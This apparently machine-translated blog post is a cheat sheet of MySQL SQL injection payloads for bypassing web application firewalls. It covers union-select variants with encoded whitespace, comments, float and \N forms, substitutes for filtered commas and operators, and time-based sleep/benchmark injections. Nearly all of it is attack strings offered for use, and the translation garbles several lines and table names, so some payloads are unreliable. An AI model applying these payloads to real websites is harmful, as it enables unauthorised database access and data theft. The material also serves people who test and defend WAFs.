0 x01 background
Mysql database feature exploration, explore the ability to bypass WAF database features.
0 x02 test
SELECT * FROM admin WHERE username = 1 union WHERE username = 1,user() FROM admin
Position one: The position between the parameter and the union
(1): common form %20, /**/, /*! 50000union*/ and other forms:
SELECT * FROM admin WHERE username = 1 union select 1,user() from admin
Other forms are: %1%20, %39%20, %40%20
(2)%0a blank characters:
The following whitespace characters are available in Mysql: %09,% 0A,%0b,% 0C,%0d,%20,% A0;
id=1%0aunion select 1,user() from admin
%23%0a
(3) Floating point form: 1.1
SELECT * FROM admin WHERE username = 1.0union select 1,user() from admin
SELECT * FROM admin WHERE username = 1.union select 1,user() from admin
Other formats are: %1%2e, %2% 2E
(4) Form of 1E0:
SELECT * FROM admin WHERE username = 1E0union select 1,user() from admin
(5) \Nunion form:
SELECT * FROM admin WHERE username = \Nunion select 1,user() from admin
Position 2: the position between union and select
(1) Whitespace characters
The following whitespace characters are available in Mysql: %09,% 0A,%0b,% 0C,%0d,%20,% A0;
id=1 union%a0select 1,user() from admin
%23%0a
(2) comment
To use a blank comment, MYSQL can use the following whitespace characters:
/ * * /
/*anything*/
(3) the parentheses
SELECT * FROM admin WHERE username =1 union(SELECT user() FROM admin limit 0,1))
Select * from admin union(select ‘test’,(select ‘asd’),(select user() from users limit 0,1)
Position 3: The position between the select and query parameters
(1) Whitespace characters
The following whitespace characters are available in Mysql: %09,% 0A,%0b,% 0C,%0d,%20,% A0;
id=1 union select%091,user() from admin
%23%0a
(2) comment
To use a blank comment, MYSQL can use the following whitespace characters:
/ * * /
/*anything*/
(3) Other characters
% the 21st! Exclamation point
% 2 b + plus
% 2 d – a minus sign
% 40@ Email symbol
The tilde
SELECT * FROM admin WHERE username = 1 union select~1,user() from admin
(4) Other ways:
SELECT * FROM admin WHERE username = 1 union SELECT (1),user() FROM admin
SELECT * FROM admin WHERE username = 1 union /*! 12345select*/1,user() from admin
SELECT * FROM admin WHERE username = 1 union SELECT @ ‘1’,user() FROM admin
SELECT * FROM admin WHERE username = 1 union SELECT {x 1},user() FROM admin
SELECT * FROM admin WHERE username = 1 union SELECT “1”,user() FROM admin
\N: SELECT * FROM admin WHERE username = 1 union SELECT \N,user() FROM admin
Position 4: Position between query parameters and from
(1) Whitespace characters
The following whitespace characters are available in Mysql: %09,% 0A,%0b,% 0C,%0d,%20,% A0;
id=1 union select 1,user()%09from admin
%23%0a
(2) comment
To use a blank comment, MYSQL can use the following whitespace characters:
/ * * /
/*anything*/
(3) Other symbols
Tilde %60: SELECT * FROM admin WHERE username = 1 union(SELECT 1,(SELECT ‘schema_name’ FROM information_schemata limit 0,1)
SELECT * FROM admin WHERE username = 1 union select 1,user()`from admin
SELECT * FROM admin WHERE username = 1 union(SELECT 1,(SELECT /*! Schema_name * / the from information_schema. SCHEMATA limit 1, 1))
{braces: SELECT * FROM admin WHERE username = 1 union(select 1,(select{x schema_name}from information_schema.SCHEMATA limit 1, 1))
Parentheses: SELECT * FROM admin WHERE username = 1 union(SELECT 1,(SELECT (schema_name) FROM information_schemata limit 1,1))
SELECT * FROM admin WHERE username = 1 union SELECT 1,user()”” FROM admin
SELECT * FROM admin WHERE username = 1 union SELECT 1,user()A FROM admin
SELECT * FROM admin WHERE username = 1 union SELECT 1,user() ‘bfrom admin
(4) floating point, 1E0 form, \N form
Id = 1 union % 0 cselect user (), 2.0 the from admin
SELECT * FROM admin WHERE username = 1 union SELECT user(),2.0 FROM admin
SELECT * FROM admin WHERE username = 1 union select user(),8e0from admin
SELECT * FROM admin WHERE username = 1 union select user(),\Nfrom admin
Position 5: From the rear
(1) Whitespace characters
The following whitespace characters are available in Mysql: %09,% 0A,%0b,% 0C,%0d,%20,% A0;
id=1 union select 1,user()%09from admin
%23%0a
(2) comment
To use a blank comment, MYSQL can use the following whitespace characters:
/ * * /
/*anything*/
(3) Other characters
Id =1 union select 1,(select(schema_name)from ‘information_schema’.SCHEMATA limit 0,1)
Id =1 union select 1,(select(schema_name)from/*! 12345 information_schema. SCHEMATA * / limit 0, 1)
{parentheses: id=1 union select 1,(select(schema_name)from {x information_schema.schemata} limit 0,1)
Id =1 union select 1,(select(schema_name)from(information_schema.schemata) limit 0,1)
In the case of the same table, uppercase and lowercase letters plus numbers are acceptable
SELECT * FROM admin WHERE username = 1 union select 1,user() from123asdadmin
Features: %23% 0A %2d% 2D % 0A
0 x03 function
1. Common filter functions
(1) String interception function
Mid (version (), 1, 1)
Substr (version (), 1, 1)
The Substring (version (), 1, 1)
Lpad (version (), 1, 1)
Rpad (version (), 1, 1)
Left(version(),1)
reverse(right(reverse(version()),1))
(2) String join function
concat(version(),’|’,user());
Concat_ws (‘ | ‘, 1, 2, 3)
Char(49) Hex(‘ a ‘) Unhex(61); Char(49) Hex(‘ a ‘);
2. Filter special symbols (such as commas)
(1) Comma at limit: limit 1 offset 0
Mid (version() from 1 for 1)
(3) Comma at union: join by join.
SELECT * FROM admin WHERE username = 1 union select * from (select 1)a join(select{x schema_name} from Information_schema. SCHEMATA limit 1, 1) b
(4) Operator <> is filtered
Select * from users where id=1 and ASCII (substr(database(),0,1))>64
If the comparison operator is filtered and the above statement cannot be used, you can use greatest instead of the comparison operator. The greatest(n1,n2,n3, etc.) function returns the maximum value of the input argument (n1,n2,n3, etc.). SQL > alter TABLE SQL > alter table SQL > alter table SQL
Select * from users where id=1 and greatest(ASCII (substr(database(),0,1)),64)=64
3. Partial function construction
(1) sleep (5)/benchmark (10000000, SHA1 (1))
id=1 xor sleep%23%0a(5)
id=1 xor sleep%2d%2d%0a(5)
id=1 xor sleep([%20]5)
id=1 xor benchmark%0a(10000000,SHA1(1))
Id =1 xor sleep[blank character](5)
The following whitespace characters are available in Mysql: %09,% 0A,%0b,% 0C,%0d,%20,% A0;
4, select {x 1} form
Select {x[fillable character]1}
The following whitespace characters are available in Mysql: %09,% 0A,%0b,% 0C,%0d,%20,% A0;
% the 21st!
%2b +
%2d –
% @ 40
%7e ~
Continuously updated…
About me: A network security enthusiast, dedicated to sharing original high-quality dry goods, welcome to follow my personal wechat public account: Bypass–, browse more wonderful articles.
